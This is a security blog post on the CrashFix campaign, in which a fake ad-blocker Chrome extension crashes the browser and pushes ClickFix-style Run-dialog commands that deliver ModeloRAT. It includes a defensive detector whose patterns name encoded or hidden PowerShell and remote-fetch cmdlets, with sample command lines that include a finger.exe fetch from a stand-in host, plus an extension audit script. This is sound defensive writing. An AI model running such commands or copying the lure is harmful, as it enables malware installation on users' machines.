Threats & Scams

CrashFix: a Chrome extension that crashes the browser to sell a fake “scan”

Huntress described KongTuke’s CrashFix chain—a store-listed ad blocker clone, deliberate browser stress, and ClickFix-style commands leading to ModeloRAT on some victims. What the loop looks like and how to break it.

eSafe Team. Published Jan 19, 2026. Last reviewed Apr 1, 2026. 8 min read.

Huntress published analysis of a campaign it calls CrashFix, tied to the broader KongTuke traffic system (also referenced under names like TAG-124 / 404 TDS in industry reporting). The story is a deliberate escalation of ClickFix-style social engineering: a Chrome extension poses as a privacy / ad-block tool, degrades or crashes the browser, then offers a bogus remediation that steers the user toward pasting a command into Windows Run—classic living-off-the-land follow-through.

Coverage described victims arriving via malicious ads while searching for an ad blocker, then installing an extension from the Chrome Web Store, “NexShield – Advanced Web Guardian”, presented as a clone of uBlock Origin Lite. The listing had on the order of thousands of installs before removal.

How the loop worked (high level)

  • Delayed activation — Malicious behavior could wait (reporting cited roughly 60 minutes after install), then repeat on a timer, which slows manual triage.
  • Tracking — A unique ID was sent to attacker infrastructure so operators could correlate victims.
  • DoS-style pressure — Before or alongside the lure, the extension could hammer the browser with resource-heavy work (described as extreme loop / connection patterns), making Chrome slow or frozen—so the user is already frustrated when a fake “browser stopped abnormally” or Edge-branded style warning appears.
  • ClickFix — The “fix” is not a patch; it is instructions to open Run and execute clipboard content—often chaining PowerShell and finger.exe-style retrieval as documented in the same research line.
  • Second stage — Obfuscated PowerShell led to ModeloRAT on some paths—Python-based, registry persistence, RC4 C2, with faster polling when operators flag a host as interesting. Domain-joined machines were called out as a preferred outcome for corporate follow-on; standalone hosts sometimes saw placeholder responses, suggesting testing or staged rollout.
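The ClickFix step above leaves a recognizable trace on the endpoint: a command pasted into the Run dialog is launched by the shell, so explorer.exe becomes the parent of a hidden or encoded PowerShell, of finger.exe, or of an unusually long cmd.exe command line. The detector below is an added example, not code from Huntress or from this article; the event fields, the mapping to process-creation telemetry, the switch patterns and the sample events are all constructed or assumed for illustration.

```python
"""Added example, not from the Huntress report or the eSafe article.

Scores process-creation events for the ClickFix hand-off: explorer.exe (the Run
dialog's launcher) spawning hidden/encoded PowerShell, finger.exe, or a very long
cmd.exe line. Field names and SAMPLE_EVENTS are constructed; real telemetry would
be mapped from Sysmon event 1 or Security event 4688 (assumed mapping).
"""
from __future__ import annotations
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


# Commands typed or pasted into the Run dialog are launched by the shell.
RUN_DIALOG_PARENTS = {"explorer.exe"}
# Switches that rarely appear when a person types a command by hand (assumed list).
POWERSHELL_RED_FLAGS = {
    "hidden window": re.compile(r"(?i)(^|\s)-(w|win|window|windowstyle)\s+hid"),
    "encoded command": re.compile(r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"),
    "no profile": re.compile(r"(?i)(^|\s)-(nop|noprofile)\b"),
    "remote fetch/eval": re.compile(r"(?i)\b(iex|invoke-expression|downloadstring|invoke-webrequest|iwr)\b"),
}
LONG_RUN_COMMAND = 200  # characters; a pasted one-liner rather than something typed


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcEvent) -> list[str]:
    """Reasons this event looks like ClickFix follow-through; empty list means no finding."""
    reasons: list[str] = []
    from_shell = _basename(ev.parent_image) in RUN_DIALOG_PARENTS
    child = _basename(ev.image)
    if child in {"powershell.exe", "pwsh.exe"} and from_shell:
        hits = [label for label, rx in POWERSHELL_RED_FLAGS.items() if rx.search(ev.command_line)]
        if hits:
            reasons.append("shell-launched PowerShell with " + ", ".join(hits))
    if child == "finger.exe":
        reasons.append("finger.exe executed (legacy client, used for payload retrieval)")
    if child == "cmd.exe" and from_shell and len(ev.command_line) > LONG_RUN_COMMAND:
        reasons.append(f"cmd.exe from the shell with a {len(ev.command_line)}-char command line (pasted content?)")
    return reasons


def scan(events: list[ProcEvent]) -> list[tuple[int, list[str]]]:
    """Index and reasons for every flagged event, in input order."""
    out = []
    for i, ev in enumerate(events):
        reasons = score_event(ev)
        if reasons:
            out.append((i, reasons))
    return out


# CONSTRUCTED sample telemetry, not real logs. The base64 below is filler.
SAMPLE_EVENTS = [
    ProcEvent("WS01", r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -nop -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"),
    ProcEvent("WS01", r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe"),  # user opened a console window: benign
    ProcEvent("WS02", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\finger.exe",
              "finger.exe someone@lolbin.example.invalid"),
    ProcEvent("WS03", r"C:\Users\dev\AppData\Local\Programs\code.exe", r"C:\Program Files\PowerShell\7\pwsh.exe",
              "pwsh.exe -NoProfile -Command Get-ChildItem"),  # IDE terminal, not the Run dialog
    ProcEvent("WS01", r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c " + "echo constructed-filler-text & " * 10),
]

if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[i]
        print(f"[{ev.host}] {ev.image} <- {ev.parent_image}")
        for r in reasons:
            print("   ", r)
```

The parent-process condition is what keeps this from paging on every developer who runs PowerShell from an IDE: the fourth sample event carries a suspicious switch but is launched from an editor, so it is not flagged, while the same switches under explorer.exe are.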

Microsoft later framed CrashFix as a notable escalation in ClickFix tradecraft—user disruption plus trusted OS utilities instead of a memory corruption exploit.

Why impersonating uBlock matters

uBlock Origin family names carry trust. A near-identical manifest and version string from an unrelated publisher is a red flag even before any malicious code runs—verify the developer account on every install.

What to do

  • Never run commands from a browser pop-up or extension “security scan.” Real fixes update the browser or OS, not Run dialogs.
  • If Chrome hangs right after a new extension, remove it in Safe Mode or via chrome://extensions after a clean restart—do not follow fix prompts from the frozen window.
  • Install ad blockers only from known publisher pages linked from official project sites—not sponsored search ads alone.
  • On managed PCs, report unexpected Run / PowerShell prompts to IT.

Practical next step

Open chrome://extensions, go through the list by install date (newest first), and remove anything search-sourced that you cannot tie to a named vendor. eSafe can help you see permissions and risk signals in one place.
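The two checks above (an ad-blocker name from an unrelated publisher, and newest installs reviewed first) can be scripted against Chrome's profile folder. The audit below is an added example, not eSafe's product code or anything from the Huntress research; it assumes Chrome's on-disk layout of Extensions/<id>/<version>/manifest.json with localized names resolved through _locales/<default_locale>/messages.json, uses directory modification time as a stand-in for install time, and ships with a placeholder allowlist (KNOWN_GOOD_IDS) that the operator fills in with the genuine extension IDs from the official project pages. The sample profile it builds for the demo is constructed.

```python
"""Added example (not part of the eSafe article or the Huntress research).

Audits a Chrome profile's Extensions folder: lists installs newest-first, flags
anything that borrows an ad-blocker brand without being an allowlisted extension
ID, and flags broad host access. Assumptions: Chrome's layout
<profile>/Extensions/<id>/<version>/manifest.json; __MSG_key__ names resolved via
_locales/<default_locale>/messages.json; directory mtime as install time.
"""
from __future__ import annotations
import json
import os
import sys
import tempfile
import time
from pathlib import Path

# PLACEHOLDER: the operator fills this with the real IDs of the genuine products
# (the value below is constructed and matches nothing in a real profile).
KNOWN_GOOD_IDS = {"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa": "uBlock Origin Lite (placeholder ID)"}
# Brand tokens whose presence in an unrelated extension is a red flag (assumed list).
IMPERSONATED_BRANDS = ("ublock", "adblock")
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def default_extension_root() -> Path:
    """Default Chrome profile Extensions folder on Windows, macOS and Linux."""
    if sys.platform.startswith("win"):
        return Path(os.environ["LOCALAPPDATA"]) / "Google" / "Chrome" / "User Data" / "Default" / "Extensions"
    if sys.platform == "darwin":
        return Path.home() / "Library" / "Application Support" / "Google" / "Chrome" / "Default" / "Extensions"
    return Path.home() / ".config" / "google-chrome" / "Default" / "Extensions"


def resolve_msg(manifest: dict, version_dir: Path, field: str) -> str:
    """Resolve a __MSG_key__ placeholder through the extension's default-locale messages.json."""
    value = str(manifest.get(field, ""))
    if value.startswith("__MSG_") and value.endswith("__"):
        key = value[6:-2]
        msgs = version_dir / "_locales" / manifest.get("default_locale", "en") / "messages.json"
        if msgs.is_file():
            table = json.loads(msgs.read_text(encoding="utf-8-sig"))
            value = table.get(key, {}).get("message", value)
    return value


def audit_extensions(ext_root: Path) -> list[dict]:
    """One record per installed extension version, newest install first."""
    findings = []
    for id_dir in sorted(p for p in ext_root.iterdir() if p.is_dir()):
        for version_dir in sorted(p for p in id_dir.iterdir() if p.is_dir()):
            mf = version_dir / "manifest.json"
            if not mf.is_file():
                continue
            manifest = json.loads(mf.read_text(encoding="utf-8-sig"))
            name = resolve_msg(manifest, version_dir, "name")
            desc = resolve_msg(manifest, version_dir, "description")
            text = (name + " " + desc).lower().replace(" ", "").replace("-", "")
            flags = []
            if any(b in text for b in IMPERSONATED_BRANDS) and id_dir.name not in KNOWN_GOOD_IDS:
                flags.append("brand lookalike: ad-blocker name/description but not an allowlisted ID")
            hosts = list(manifest.get("host_permissions", [])) + list(manifest.get("permissions", []))
            if BROAD_HOSTS.intersection(hosts):
                flags.append("broad host access")
            installed = version_dir.stat().st_mtime
            findings.append({"id": id_dir.name, "name": name, "version": str(manifest.get("version", "?")),
                             "installed": time.strftime("%Y-%m-%d %H:%M", time.localtime(installed)),
                             "installed_ts": installed, "flags": flags})
    findings.sort(key=lambda f: f["installed_ts"], reverse=True)
    return findings


def build_sample_profile(root: Path) -> None:
    """Write a CONSTRUCTED three-extension profile for offline demonstration."""
    samples = [  # (id, manifest, messages.json content, age in days)
        ("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
         {"name": "uBlock Origin Lite", "version": "2025.1", "manifest_version": 3,
          "host_permissions": ["<all_urls>"]}, None, 30),
        ("bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb",
         {"name": "__MSG_extName__", "description": "__MSG_extDesc__", "default_locale": "en",
          "version": "2025.1", "manifest_version": 3, "host_permissions": ["<all_urls>"]},
         {"extName": {"message": "Web Guardian Pro (constructed)"},
          "extDesc": {"message": "Cloned from uBlock Origin Lite"}}, 0),
        ("cccccccccccccccccccccccccccccccc",
         {"name": "Notes (constructed)", "version": "1.0", "manifest_version": 3,
          "permissions": ["storage"]}, None, 90),
    ]
    for ext_id, manifest, messages, age in samples:
        vdir = root / ext_id / (manifest["version"] + "_0")
        vdir.mkdir(parents=True)
        (vdir / "manifest.json").write_text(json.dumps(manifest), encoding="utf-8")
        if messages:
            ldir = vdir / "_locales" / "en"
            ldir.mkdir(parents=True)
            (ldir / "messages.json").write_text(json.dumps(messages), encoding="utf-8")
        stamp = time.time() - age * 86400
        os.utime(vdir, (stamp, stamp))  # fake the install time for the demo


def demo() -> list[dict]:
    """Build the constructed profile in a temp dir and audit it."""
    root = Path(tempfile.mkdtemp(prefix="ext-audit-"))
    build_sample_profile(root)
    return audit_extensions(root)


if __name__ == "__main__":
    if "--demo" in sys.argv:
        results = demo()
    else:
        results = audit_extensions(Path(sys.argv[1]) if len(sys.argv) > 1 else default_extension_root())
    for f in results:
        print(f"{f['installed']}  {f['id']}  {f['name']} {f['version']}  {'; '.join(f['flags']) or 'no flags'}")
```

Run it with --demo to see the constructed profile, or point it at a real Extensions folder. The genuine product in the demo still shows "broad host access", which is expected for an ad blocker; the signal that matters is the combination of a brand name with an ID that is not the publisher's, which is exactly what a store-listed clone looks like on disk.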

Go deeper

Crash, freeze, and fake support pages: how tab-lock scams compare to extension-driven pressure tactics.

Report: The Hacker News.

FAQ

What is the core social-engineering trick?
The browser is made unreliable on purpose so the user follows instructions that feel like legitimate troubleshooting but execute attacker-controlled commands or installers.

Why is this related to KongTuke / TAG-124 reporting?
Industry analysis ties the traffic and infrastructure patterns to broader KongTuke-style monetization and delivery networks; exact names vary by vendor.

What should I never do when a site or extension tells me to?
Do not paste PowerShell, cmd, or obscure strings into Run, Terminal, or the browser address bar because a popup demands it—verify through your IT team or official vendor support channels.
